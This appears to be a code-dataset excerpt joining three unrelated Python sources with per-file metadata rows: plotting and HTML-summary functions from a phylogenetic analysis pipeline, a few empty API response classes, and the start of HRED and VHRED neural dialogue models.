        # Simple linear regression of sCF on branch length

        plt.figure(figsize=(8,6));
        plt.plot(bls, scfs_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
        plt.scatter(bls, scfs, color=PC.coreCol(numcol=1)[0], alpha=0.5);
        plt.xlabel("Branch length");
        plt.ylabel("sCF");
        plt.savefig(bl_scf_file, dpi=100);
        plt.close();
        # Branch length vs. sCF (scatter w regression)
        ####################

    step_start_time = PC.report_step(globs, step, step_start_time, "Success");
#############################################################################
def writeHTML(globs):
    """Render the pre-run HTML summary page from the TEMPLATES module and
    write it to globs['html-file'].

    Several template blocks are toggled on/off by wrapping them in HTML
    comments depending on run options (run mode, --theta, -l, batch mode).

    Args:
        globs: The global options/state dict.

    Returns:
        The updated globs dict with 'html-summary-written' set to True.
    """

    step = "Writing HTML summary file";
    step_start_time = PC.report_step(globs, step, False, "In progress...");
    # Status update

    adaptive = globs['run-mode'] == 'adaptive';
    comment_start = "" if adaptive else "<!-- This block is only used when run mode (-r) is adaptive";
    comment_end = "" if adaptive else "-->";
    # Some HTML blocks will be commented out depending on the run mode

    theta_comment_start = "" if globs['theta'] else "<!-- This block is only displayed when --theta is specified";
    theta_comment_end = "" if globs['theta'] else "-->";
    # The theta block is only shown when --theta is given

    coal_tree_comment_start = "" if globs['coal-tree-file'] else "<!-- This block is only displayed when -l is specified";
    coal_tree_comment_end = "" if globs['coal-tree-file'] else "-->";
    # The coalescent tree block is only shown when -l is given

    batch_comment_start = "<!-- This block is only displayed with the --plotonly option" if globs['batch'] else "";
    batch_comment_end = "-->" if globs['batch'] else "";
    # The batch block is hidden for batch runs

    template_fields = {
        "run_name": globs['run-name'],
        "run_time": globs['startdatetimenice'],
        "host_name": os.uname()[1],
        "script_call": globs['call'],
        "num_aln": str(globs['num-loci']),
        "num_no_inf_loci": str(len(globs['no-inf-sites-loci'])),
        "num_st_loci": str(globs['st-loci']),
        "num_gt_loci": str(globs['gt-loci']),
        "num_batches": str(globs['num-batches']),
        "batch_size": str(globs['batch-size']),
        "procs_per_batch": str(globs['procs-per-job']),
        "num_st_batches": str(len(globs['st-batches'])),
        "num_gt_batches": str(len(globs['gt-batches'])),
        "num_jobs": str(globs['num-jobs']),
        "num_spec": str(len(globs['tree-tips'])),
        "num_targets": str(len(globs['targets'])),
        "num_conserved": str(len(globs['conserved'])),
        "num_outgroups": str(len(globs['outgroup'])),
        "log_file": globs['logfilename'],
        "aln_stats_file": globs['alnstatsfile'],
        "batch_comment_start": batch_comment_start,
        "batch_comment_end": batch_comment_end,
        "snakemake_cmd": globs['smk-cmd'],
        "theta_comment_start": theta_comment_start,
        "theta_comment_end": theta_comment_end,
        "coal_tree_comment_start": coal_tree_comment_start,
        "coal_tree_file": globs['coal-tree-file'],
        "coal_tree_comment_end": coal_tree_comment_end,
        "input_tree_plot": os.path.join("plots", globs['input-tree-plot-file']),
        "avg_aln_len": str(round(globs['avg-aln-len'], 3)),
        "median_aln_len": str(round(globs['med-aln-len'], 3)),
        "avg_seq_len_nogap": str(round(globs['avg-nogap-seq-len'], 3)),
        "med_seq_len_nogap": str(round(globs['med-nogap-seq-len'], 3)),
        "aln_len_hist": os.path.join("plots", globs['aln-len-plot-file']),
        "seq_len_hist": os.path.join("plots", globs['seq-len-plot-file']),
        "informative_sites_hist": os.path.join("plots", globs['inf-sites-plot-file']),
        "informative_sites_frac_hist": os.path.join("plots", globs['inf-sites-frac-plot-file']),
        "variable_informative_sites_plot": os.path.join("plots", globs['var-inf-sites-plot-file']),
        "comment_start": comment_start,
        "comment_end": comment_end,
        "avg_scf_hist": os.path.join("plots", globs['avg-scf-hist-file']),
        "low_scf_hist": os.path.join("plots", globs['low-scf-hist-file']),
        "scf_tree_plot": os.path.join("plots", globs['scf-tree-plot-file']),
        "bl_scf_plot": os.path.join("plots", globs['bl-scf-plot-file']),
        "date_time": PC.getFooterDateTime(),
    };
    # All substitution values expected by the pre-run HTML template

    with open(globs['html-file'], "w") as htmlfile:
        htmlfile.write(TEMPLATES.htmlSummary().format(**template_fields));
    # Write the HTML summary file using the template

    step_start_time = PC.report_step(globs, step, step_start_time, "Success");
    globs['html-summary-written'] = True;
    # Status update

    return globs;
#############################################################################
def genPlotsPost(globs):
    """Generate the post-processing summary plots and flag accelerated loci.

    Plots produced: histograms of log BF1 and log BF2 per locus, and a
    BF1 vs. BF2 scatter with the acceleration cutoffs drawn as dashed lines.
    Loci exceeding both cutoffs are recorded in globs['accelerated-loci'].

    Args:
        globs: The global options/state dict; reads 'locus-stats' and the
            'bf1-cutoff'/'bf2-cutoff' values, sets 'accelerated-loci'.

    Returns:
        The updated globs dict.
    """

    step = "Generating summary plots";
    step_start_time = PC.report_step(globs, step, False, "In progress...");
    # Status update

    mpl.rcParams["axes.spines.right"] = False;
    mpl.rcParams["axes.spines.top"] = False;
    mpl.rcParams["axes.labelsize"] = 16;
    mpl.rcParams["axes.edgecolor"] = "#595959";
    mpl.rcParams["axes.linewidth"] = 1.5;
    mpl.rcParams["xtick.labelcolor"] = "#595959";
    mpl.rcParams["xtick.labelsize"] = 14;
    mpl.rcParams['xtick.color'] = "#595959";
    mpl.rcParams['xtick.major.size'] = 6;
    mpl.rcParams['xtick.major.width'] = 1.5;
    mpl.rcParams["ytick.labelcolor"] = "#595959";
    mpl.rcParams["ytick.labelsize"] = 14;
    mpl.rcParams['ytick.color'] = "#595959";
    mpl.rcParams['ytick.major.size'] = 6;
    mpl.rcParams['ytick.major.width'] = 1.5;
    # Global theme settings for all matplotlib figures following

    ####################

    locus_list = [ locus for locus in globs['locus-stats']['elem_lik'] ];
    # A single list of locus IDs for consistency between dictionary lookups

    bf1s = [ float(globs['locus-stats']['elem_lik'][locus]['logBF1']) for locus in locus_list ];
    bf2s = [ float(globs['locus-stats']['elem_lik'][locus]['logBF2']) for locus in locus_list ];
    # The log Bayes factors per locus

    globs['accelerated-loci'] = [ locus_list[i] for i in range(len(locus_list)) if bf1s[i] > globs['bf1-cutoff'] and bf2s[i] > globs['bf2-cutoff'] ];
    # Accelerated loci are those exceeding BOTH Bayes factor cutoffs
    ####################

    bf1_dist_file = os.path.join(globs['plot-dir'], globs['bf1-dist-file']);
    plt.figure(figsize=(8,6));
    plt.hist(bf1s, color=PC.coreCol(pal="wilke", numcol=1, offset=1)[0], bins="sturges", edgecolor="#999999");
    plt.xlabel("log BF1");
    plt.ylabel("# loci");
    plt.savefig(bf1_dist_file, dpi=100);
    plt.close();
    # BF1 (hist); close the figure after saving so figures don't accumulate
    ####################

    bf2_dist_file = os.path.join(globs['plot-dir'], globs['bf2-dist-file']);
    plt.figure(figsize=(8,6));
    plt.hist(bf2s, color=PC.coreCol(pal="wilke", numcol=1, offset=2)[0], bins="sturges", edgecolor="#999999");
    plt.xlabel("log BF2");
    plt.ylabel("# loci");
    plt.savefig(bf2_dist_file, dpi=100);
    plt.close();
    # BF2 (hist)
    ####################

    bf1_bf2_file = os.path.join(globs['plot-dir'], globs['bf1-bf2-plot-file']);
    plt.figure(figsize=(8,6));
    plt.scatter(bf1s, bf2s, color=PC.coreCol(pal="wilke", numcol=1, offset=5)[0], alpha=0.25);
    plt.axvline(x=globs['bf1-cutoff'], color='#d3d3d3', linestyle='--');
    plt.axhline(y=globs['bf2-cutoff'], color='#d3d3d3', linestyle='--');
    plt.xlabel("log BF1");
    plt.ylabel("log BF2");
    plt.savefig(bf1_bf2_file, dpi=100);
    plt.close();
    # BF1 vs. BF2 (scatter) with the acceleration cutoffs as dashed lines.
    # NOTE(review): the previous version computed an unused regression fit and
    # unused filtered BF lists here, and carried a large unreachable section
    # (referencing undefined names) after the return below; all removed.
    ####################

    step_start_time = PC.report_step(globs, step, step_start_time, "Success");
    return globs;
#############################################################################
def writeHTMLPost(globs):
    """Render the post-processing HTML summary page from the TEMPLATES_POST
    module and write it to globs['html-file'].

    Pre-run-only template fields are filled with empty-string placeholders;
    the incomplete-batch block is toggled via HTML comment wrappers.

    Args:
        globs: The global options/state dict.

    Returns:
        The updated globs dict with 'html-summary-written' set to True.
    """

    step = "Writing HTML summary file";
    step_start_time = PC.report_step(globs, step, False, "In progress...");
    # Status update

    comment_start = "<!--";
    comment_end = "-->";
    # These wrappers always comment out the pre-run-only blocks post-run

    has_incomplete = bool(globs['incomplete-batches']);
    batch_comment_start = "" if has_incomplete else "<!-- This block is only displayed if incomplete batches were detected";
    batch_comment_end = "" if has_incomplete else "-->";
    # The incomplete-batch block is only shown when incomplete batches exist

    placeholder = "";
    # Pre-run statistics are unavailable post-run; their fields get empty strings

    template_fields = {
        "run_name": globs['run-name'],
        "run_time": globs['startdatetimenice'],
        "host_name": os.uname()[1],
        "script_call": globs['call'],
        "num_batches_complete_st": str(len(globs['complete-batches-st'])),
        "num_batches_complete_gt": str(len(globs['complete-batches-gt'])),
        "num_batches_incomplete_st": str(len(globs['incomplete-batches-st'])),
        "num_batches_incomplete_gt": str(len(globs['incomplete-batches-gt'])),
        "total_loci": str(len(globs['locus-stats']['elem_lik'])),
        "accelerated_loci": str(len(globs['accelerated-loci'])),
        "batch_size": str(globs['batch-size']),
        "procs_per_batch": str(globs['procs-per-batch']),
        "avg_runtime": str(round(PC.mean(globs['batch-runtimes']))),
        "batch_comment_start": batch_comment_start,
        "incomplete_batches": ", ".join(globs['incomplete-batches']),
        "batch_comment_end": batch_comment_end,
        "log_file": globs['logfilename'],
        "results_folder": globs['outdir'],
        "bf1_hist": os.path.join("plots", globs['bf1-dist-file']),
        "bf2_hist": os.path.join("plots", globs['bf2-dist-file']),
        "bf1_bf2_plot": os.path.join("plots", globs['bf1-bf2-plot-file']),
        "comment_start": comment_start,
        "comment_end": comment_end,
        "num_spec": placeholder,
        "num_targets": placeholder,
        "num_conserved": placeholder,
        "num_outgroups": placeholder,
        "input_tree_plot": placeholder,
        "avg_aln_len": placeholder,
        "median_aln_len": placeholder,
        "avg_seq_len_nogap": placeholder,
        "med_seq_len_nogap": placeholder,
        "date_time": PC.getFooterDateTime(),
    };
    # All substitution values expected by the post-run HTML template

    with open(globs['html-file'], "w") as htmlfile:
        htmlfile.write(TEMPLATES_POST.htmlSummary().format(**template_fields));
    # Write the HTML summary file using the template

    step_start_time = PC.report_step(globs, step, step_start_time, "Success");
    globs['html-summary-written'] = True;
    # Status update

    return globs;
| 40.561905
| 150
| 0.599114
| 4,587
| 34,072
| 4.313277
| 0.084587
| 0.01304
| 0.019712
| 0.019712
| 0.870811
| 0.84003
| 0.81117
| 0.787617
| 0.780238
| 0.774223
| 0
| 0.023798
| 0.216864
| 34,072
| 840
| 151
| 40.561905
| 0.717685
| 0.262209
| 0
| 0.631841
| 1
| 0
| 0.177305
| 0.007654
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00995
| false
| 0
| 0.034826
| 0
| 0.052239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc01ea8195a47767f88ef0c918f85a0c274301f5
| 90
|
py
|
Python
|
actualizer/api/response.py
|
mcqueenjordan/actualizer
|
359642d90173b598b58af7b3da55d748abdca614
|
[
"MIT"
] | 1
|
2018-04-29T04:40:25.000Z
|
2018-04-29T04:40:25.000Z
|
actualizer/api/response.py
|
mcqueenjordan/actualizer
|
359642d90173b598b58af7b3da55d748abdca614
|
[
"MIT"
] | null | null | null |
actualizer/api/response.py
|
mcqueenjordan/actualizer
|
359642d90173b598b58af7b3da55d748abdca614
|
[
"MIT"
] | null | null | null |
class Response:
    """Base marker type for all API responses."""


class LogResponse(Response):
    """Marker type for log responses."""


class ListResponse(Response):
    """Marker type for list responses."""
| 22.5
| 34
| 0.822222
| 11
| 90
| 6.727273
| 0.454545
| 0.486486
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 90
| 3
| 35
| 30
| 0.91358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
fc06465937e3d0ab551aeffda8404be01702f760
| 48,586
|
py
|
Python
|
model/models.py
|
UmaTaru/run
|
be29e4d41a4de3dee27cd6796801bfe51382d294
|
[
"MIT"
] | 163
|
2019-06-23T14:07:57.000Z
|
2022-02-25T23:06:07.000Z
|
model/models.py
|
UmaTaru/run
|
be29e4d41a4de3dee27cd6796801bfe51382d294
|
[
"MIT"
] | 8
|
2019-07-24T12:41:31.000Z
|
2022-02-10T00:17:20.000Z
|
model/models.py
|
UmaTaru/run
|
be29e4d41a4de3dee27cd6796801bfe51382d294
|
[
"MIT"
] | 31
|
2019-06-26T01:21:07.000Z
|
2021-09-06T17:23:24.000Z
|
import torch
import torch.nn as nn
from model.utils import to_var, pad, normal_kl_div, normal_logpdf, bag_of_words_loss, to_bow, EOS_ID, detokenize
import model.layers as layers
import numpy as np
# Model class names treated as variational variants.
# NOTE(review): presumably used by callers to toggle KL/latent-variable logic
# for the VHRED/VHCR models — confirm against the code that consumes this list.
VariationalModels = ['VHRED', 'VHCR']
class HRED(nn.Module):
    def __init__(self, config):
        """Build the HRED model components from the run configuration.

        Constructs an utterance-level encoder RNN, a conversation-level
        context RNN, a decoder RNN, and a feed-forward bridge from context
        states to decoder initial states, plus optional emotion / InferSent
        prediction heads when enabled in config.

        Args:
            config: Configuration object providing sizes, layer counts,
                dropout, and feature flags read below.
        """
        super(HRED, self).__init__()

        self.config = config
        # Encodes each utterance into a hidden state
        self.encoder = layers.EncoderRNN(config.vocab_size,
                                         config.embedding_size,
                                         config.encoder_hidden_size,
                                         config.rnn,
                                         config.num_layers,
                                         config.bidirectional,
                                         config.dropout)

        # Context input is the flattened encoder hidden state
        # (layers * directions * hidden)
        context_input_size = (config.num_layers
                              * config.encoder_hidden_size
                              * self.encoder.num_directions)
        if config.context_input_only:
            # When extra features feed the context RNN directly, widen its
            # input by the emotion and InferSent feature sizes
            context_input_size += (config.emo_output_size \
                                   + config.infersent_output_size)
        # Summarizes the sequence of utterance encodings per conversation
        self.context_encoder = layers.ContextRNN(context_input_size,
                                                 config.context_size,
                                                 config.rnn,
                                                 config.num_layers,
                                                 config.dropout)

        # Generates the response conditioned on the decoder's initial state
        self.decoder = layers.DecoderRNN(config.vocab_size,
                                         config.embedding_size,
                                         config.decoder_hidden_size,
                                         config.rnncell,
                                         config.num_layers,
                                         config.dropout,
                                         config.word_drop,
                                         config.max_unroll,
                                         config.sample,
                                         config.temperature,
                                         config.beam_size)

        # Projects a context vector to the decoder's initial hidden state(s)
        self.context2decoder = layers.FeedForward(config.context_size,
                                                  config.num_layers * config.decoder_hidden_size,
                                                  num_layers=1,
                                                  activation=config.activation)

        if config.tie_embedding:
            # Share input embeddings between encoder and decoder
            self.decoder.embedding = self.encoder.embedding

        if config.emotion:
            # Optional head predicting emotion features from the context state
            self.context2emoji = layers.FeedForward(
                config.context_size, config.emo_output_size,
                num_layers=config.emo_num_layers,
                hidden_size=config.emo_embedding_size,
                activation=config.emo_activation)

        if config.infersent:
            # Optional head predicting InferSent features from the context
            # state; no activation on the last layer
            self.context2infersent = layers.FeedForward(
                config.context_size, config.infersent_output_size,
                num_layers=config.infersent_num_layers,
                hidden_size=config.infersent_embedding_size,
                activation=config.infersent_activation,
                no_activation_last_layer=True)
def forward(self, input_sentences, input_sentence_length,
input_conversation_length, target_sentences, decode=False,
extra_context_inputs=None, rl_mode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
num_sentences = input_sentences.size(0)
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences, max_source_length, hidden_size * direction]
# encoder_hidden: [num_layers * direction, num_sentences, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(
input_sentences, input_sentence_length)
# encoder_hidden: [num_sentences, num_layers * direction * hidden_size]
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1])), 0)
# encoder_hidden: [batch_size, max_len, num_layers * direction * hidden_size]
context_inputs = torch.stack([pad(context_inputs_2d.narrow(0, s, l), max_len)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
context_inputs, input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# Stop gradients from flowing from discriminator if only using input
if self.config.context_input_only:
discriminator_input = context_outputs.detach()
else:
discriminator_input = context_outputs
# Predict emojis using discriminator.
emoji_preds = None
if self.config.emotion:
emoji_preds = self.context2emoji(discriminator_input)
# Predict infersent using discriminator.
infersent_preds = None
if self.config.infersent:
infersent_preds = self.context2infersent(discriminator_input)
# project context_outputs to decoder init state
decoder_init = self.context2decoder(context_outputs)
# [num_layers, batch_size, hidden_size]
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if rl_mode or not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, emoji_preds, infersent_preds
else:
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs.unsqueeze(1)
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# Get top prediction only
# [batch_size, max_unroll]
# prediction = prediction[:, 0]
# [batch_size, beam_size, max_unroll]
return prediction, emoji_preds, infersent_preds
def generate(self, context, sentence_length, n_context,
extra_context_inputs=None, botsent=None, botmoji=None,
vocab=None):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
context_inputs_2d = raw_encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(context_inputs_2d,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
decoder_init = self.context2decoder(context_outputs)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, raw_encoder_hidden = self.encoder(prediction,
length)
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
# Dynamically assess the DeepMoji and Infersent predictions on
# generated text
if self.config.context_input_only:
dynamic_context_inputs = dynamically_assess_context_inputs(
prediction, botmoji, botsent, vocab, self.config)
context_inputs_2d = torch.cat(
(context_inputs_2d, dynamic_context_inputs), 1)
context_outputs, context_hidden = self.context_encoder.step(
context_inputs_2d, context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHRED(nn.Module):
    """Variational HRED.

    HRED augmented with a per-utterance latent variable z_sent: a
    context-dependent Gaussian prior, and a posterior conditioned on the
    context state plus the encoding of the target utterance. The decoder is
    initialized from [context; z_sent]. Optionally adds a bag-of-words
    auxiliary loss and emoji/InferSent discriminator heads.
    """

    def __init__(self, config):
        super(VHRED, self).__init__()
        self.config = config
        # Per-utterance encoder.
        self.encoder = layers.EncoderRNN(config.vocab_size,
                                         config.embedding_size,
                                         config.encoder_hidden_size,
                                         config.rnn,
                                         config.num_layers,
                                         config.bidirectional,
                                         config.dropout)

        # Flattened per-sentence encoder state size.
        context_input_size = (config.num_layers
                              * config.encoder_hidden_size
                              * self.encoder.num_directions)
        # Posterior sees the next utterance's encoding plus the context state.
        posterior_input_size = (config.num_layers
                                * config.encoder_hidden_size
                                * self.encoder.num_directions
                                + config.context_size)
        if config.context_input_only:
            # Emotion/InferSent features are appended to both inputs.
            context_input_size += (config.emo_output_size
                                   + config.infersent_output_size)
            posterior_input_size += (config.emo_output_size
                                     + config.infersent_output_size)

        self.context_encoder = layers.ContextRNN(context_input_size,
                                                 config.context_size,
                                                 config.rnn,
                                                 config.num_layers,
                                                 config.dropout)

        self.decoder = layers.DecoderRNN(config.vocab_size,
                                         config.embedding_size,
                                         config.decoder_hidden_size,
                                         config.rnncell,
                                         config.num_layers,
                                         config.dropout,
                                         config.word_drop,
                                         config.max_unroll,
                                         config.sample,
                                         config.temperature,
                                         config.beam_size)

        # Decoder init from the concatenated [context; z_sent].
        self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size,
                                                  config.num_layers * config.decoder_hidden_size,
                                                  num_layers=1,
                                                  activation=config.activation)

        # Softplus keeps predicted variances positive.
        self.softplus = nn.Softplus()

        # Prior network p(z_sent | context).
        self.prior_h = layers.FeedForward(config.context_size,
                                          config.context_size,
                                          num_layers=2,
                                          hidden_size=config.context_size,
                                          activation=config.activation)
        self.prior_mu = nn.Linear(config.context_size,
                                  config.z_sent_size)
        self.prior_var = nn.Linear(config.context_size,
                                   config.z_sent_size)

        # Posterior network q(z_sent | context, target utterance encoding).
        self.posterior_h = layers.FeedForward(posterior_input_size,
                                              config.context_size,
                                              num_layers=2,
                                              hidden_size=config.context_size,
                                              activation=config.activation)
        self.posterior_mu = nn.Linear(config.context_size,
                                      config.z_sent_size)
        self.posterior_var = nn.Linear(config.context_size,
                                       config.z_sent_size)

        if config.tie_embedding:
            self.decoder.embedding = self.encoder.embedding

        if config.bow:
            # Bag-of-words auxiliary head: z_sent -> vocabulary logits.
            self.bow_h = layers.FeedForward(config.z_sent_size,
                                            config.decoder_hidden_size,
                                            num_layers=1,
                                            hidden_size=config.decoder_hidden_size,
                                            activation=config.activation)
            self.bow_predict = nn.Linear(config.decoder_hidden_size, config.vocab_size)

        if config.emotion:
            # Discriminator head: context state -> emoji distribution.
            self.context2emoji = layers.FeedForward(
                config.context_size, config.emo_output_size,
                num_layers=config.emo_num_layers,
                hidden_size=config.emo_embedding_size,
                activation=config.emo_activation)

        if config.infersent:
            # Discriminator head: context state -> InferSent embedding.
            self.context2infersent = layers.FeedForward(
                config.context_size, config.infersent_output_size,
                num_layers=config.infersent_num_layers,
                hidden_size=config.infersent_embedding_size,
                activation=config.infersent_activation,
                no_activation_last_layer=True)

    def prior(self, context_outputs):
        """Context-dependent Gaussian prior: returns (mu, var) of z_sent."""
        h_prior = self.prior_h(context_outputs)
        mu_prior = self.prior_mu(h_prior)
        var_prior = self.softplus(self.prior_var(h_prior))
        return mu_prior, var_prior

    def posterior(self, context_outputs, encoder_hidden):
        """Gaussian posterior conditioned on context and the target
        utterance's encoder state: returns (mu, var) of z_sent."""
        h_posterior = self.posterior_h(torch.cat([context_outputs, encoder_hidden], 1))
        mu_posterior = self.posterior_mu(h_posterior)
        var_posterior = self.softplus(self.posterior_var(h_posterior))
        return mu_posterior, var_posterior

    def compute_bow_loss(self, target_conversations):
        """Bag-of-words auxiliary loss predicted from the z_sent sampled in
        the most recent forward() call (stored on self.z_sent)."""
        target_bow = np.stack([to_bow(sent, self.config.vocab_size) for conv in target_conversations for sent in conv], axis=0)
        target_bow = to_var(torch.FloatTensor(target_bow))
        bow_logits = self.bow_predict(self.bow_h(self.z_sent))
        bow_loss = bag_of_words_loss(bow_logits, target_bow)
        return bow_loss

    def forward(self, sentences, sentence_length, input_conversation_length,
                target_sentences, decode=False, extra_context_inputs=None,
                rl_mode=False):
        """Encode conversations, sample z_sent (posterior during training,
        prior otherwise), and decode.

        Args:
            sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
                — includes one extra (target) utterance per conversation.
            target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
        Return:
            Tuple starting with decoder outputs / predictions, then
            (kl_div, log_p_z, log_q_zx, emoji_preds, infersent_preds)
            and, on the rl_mode+decode path, (word_probs, log_p_z_sent).
            decoder_outputs: (Variable, FloatTensor)
                - train: [batch_size, seq_len, vocab_size]
                - eval: [batch_size, seq_len]
        """
        batch_size = input_conversation_length.size(0)
        num_sentences = sentences.size(0) - batch_size
        max_len = input_conversation_length.data.max().item()

        # encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
        # encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
        encoder_outputs, raw_encoder_hidden = self.encoder(sentences,
                                                           sentence_length)

        # encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
        context_inputs_2d = raw_encoder_hidden.transpose(
            1, 0).contiguous().view(num_sentences + batch_size, -1)
        if self.config.context_input_only:
            context_inputs_2d = torch.cat(
                (context_inputs_2d, extra_context_inputs), 1)

        # pad and pack encoder_hidden
        # Each conversation contributes (length + 1) utterances here, hence
        # the "+ 1" in the offsets and pad widths below.
        start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
                                        input_conversation_length[:-1] + 1)), 0)

        # encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
        context_inputs = torch.stack([pad(context_inputs_2d.narrow(0, s, l + 1), max_len + 1)
                                      for s, l in zip(start.data.tolist(),
                                                      input_conversation_length.data.tolist())], 0)

        # Shifted view: utterance t+1's encoding, used by the posterior.
        # encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
        context_inputs_inference = context_inputs[:, 1:, :]
        context_inputs_inference_flat = torch.cat(
            [context_inputs_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])

        # encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
        context_inputs_input = context_inputs[:, :-1, :]

        # context_outputs: [batch_size, max_len, context_size]
        context_outputs_with_targets, context_last_hidden = self.context_encoder(
            context_inputs_input, input_conversation_length)

        # flatten outputs
        # context_outputs: [num_sentences, context_size]
        context_outputs = torch.cat([context_outputs_with_targets[i, :l, :]
                                     for i, l in enumerate(input_conversation_length.data)])

        # Stop gradients from flowing from discriminator if only using input
        if self.config.context_input_only:
            discriminator_input = context_outputs.detach()
        else:
            discriminator_input = context_outputs

        # Predict emojis using discriminator.
        emoji_preds = None
        if self.config.emotion:
            emoji_preds = self.context2emoji(discriminator_input)

        # Predict sentence embeddings using discriminator
        infersent_preds = None
        if self.config.infersent:
            infersent_preds = self.context2infersent(discriminator_input)

        mu_prior, var_prior = self.prior(context_outputs)
        eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
        if not rl_mode and not decode:
            # Training: reparameterized sample from the posterior.
            mu_posterior, var_posterior = self.posterior(
                context_outputs, context_inputs_inference_flat)
            z_sent = mu_posterior + torch.sqrt(var_posterior) * eps
            log_q_zx = normal_logpdf(z_sent, mu_posterior, var_posterior).sum()

            log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
            # kl_div: [num_sentneces]
            kl_div = normal_kl_div(mu_posterior, var_posterior,
                                   mu_prior, var_prior)
            kl_div = torch.sum(kl_div)
        else:
            # Inference / RL: sample from the prior.
            z_sent = mu_prior + torch.sqrt(var_prior) * eps
            kl_div = None
            # Manager action. Detach since it's a sampled action.
            # Gradients flow through mu and Sigma but not z
            log_p_z_sent = normal_logpdf(z_sent.detach(), mu_prior, var_prior)
            log_p_z = log_p_z_sent.sum()
            log_q_zx = None

        # Stashed for compute_bow_loss().
        self.z_sent = z_sent
        latent_context = torch.cat([context_outputs, z_sent], 1)
        decoder_init = self.context2decoder(latent_context)
        decoder_init = decoder_init.view(-1,
                                         self.decoder.num_layers,
                                         self.decoder.hidden_size)
        decoder_init = decoder_init.transpose(1, 0).contiguous()

        # train: [batch_size, seq_len, vocab_size]
        # eval: [batch_size, seq_len]
        if rl_mode and decode:
            # VHRL or REINFORCE step
            # prediction: [num_sents, max_sent_len]
            # word_probs: [num_sents, max_sent_len]
            prediction, word_probs = self.decoder(inputs=None,
                                                  init_h=decoder_init,
                                                  decode=decode,
                                                  return_probs=True)
            return (prediction, kl_div, log_p_z, log_q_zx,
                    emoji_preds, infersent_preds, word_probs, log_p_z_sent)
        elif rl_mode or not decode:
            # Batch RL step or MLE pre-training step
            decoder_outputs = self.decoder(target_sentences,
                                           init_h=decoder_init,
                                           decode=decode)
            return (decoder_outputs, kl_div, log_p_z, log_q_zx,
                    emoji_preds, infersent_preds)
        else:
            # prediction: [batch_size, beam_size, max_unroll]
            prediction, final_score, length = self.decoder.beam_decode(
                init_h=decoder_init)
